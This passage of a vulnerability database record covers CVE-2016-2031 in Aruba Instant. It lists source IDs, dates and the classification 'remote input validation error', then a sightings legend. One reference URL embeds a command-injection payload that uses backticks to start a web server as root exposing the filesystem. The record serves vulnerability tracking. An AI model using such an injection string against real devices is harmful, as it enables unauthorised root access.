"http://10.0.0.1/?\"`/usr/sbin/mini_httpd+-d+/+-u+root+-p+1234+-c+/etc/mini_httpd.conf`\"\u0026auto_reboot=false\u0026refresh=true\u0026sid=owsiu5mm7dxvf9frwe3p\u0026nocache=0.9368100591919084" }, { "trust": 0.1, "url": "http://community.arubanetworks.com/aruba/attachments/aruba/aaa-nac-guest-access-byod/25840/1/control_plane_security_best_practices_1_0.pdf" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2007-0932" }, { "trust": 0.1, "url": "https://10.0.xx.xx:4343/" }, { "trust": 0.1, "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2016-006.txt" }, { "trust": 0.1, "url": "http://images.arubanetworks.com/fwfiles/arubainstant_orion_6.4.2.6-4.1.1.10_51810" }, { "trust": 0.1, "url": "http://community.arubanetworks.com/t5/unified-wired-wireless-access/os5-0-support-password/td-p/26760" }, { "trust": 0.1, "url": "http://10.0.0.1:4321/arubainstant_aries_6.4.2.6-4.1.1.10_51810" } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "PACKETSTORM", "id": "136997" }, { "db": "CNNVD", "id": "CNNVD-201607-362" }, { "db": "NVD", "id": "CVE-2016-2031" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "BID", "id": "90207" }, { "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "db": "PACKETSTORM", "id": "136997" }, { "db": "CNNVD", "id": "CNNVD-201607-362" }, { "db": "NVD", "id": "CVE-2016-2031" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-05-06T00:00:00", "db": "BID", "id": "90207" }, { "date": "2020-02-18T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "date": "2016-05-06T23:02:22", "db": "PACKETSTORM", "id": "136997" }, { "date": "2016-05-06T00:00:00", "db": "CNNVD", "id": "CNNVD-201607-362" }, { "date": "2020-01-31T20:15:00", "db": "NVD", "id": "CVE-2016-2031" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-07-06T14:36:00", "db": "BID", "id": "90207" }, { "date": "2020-02-18T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-009614" }, { "date": "2020-11-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201607-362" }, { "date": "2021-05-04T13:32:00", "db": "NVD", "id": "CVE-2016-2031" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "136997" }, { "db": "CNNVD", "id": "CNNVD-201607-362" } ], "trust": 0.7 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Aruba Instant Input verification vulnerability in", "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-009614" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201607-362" } ], "trust": 0.6 } }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.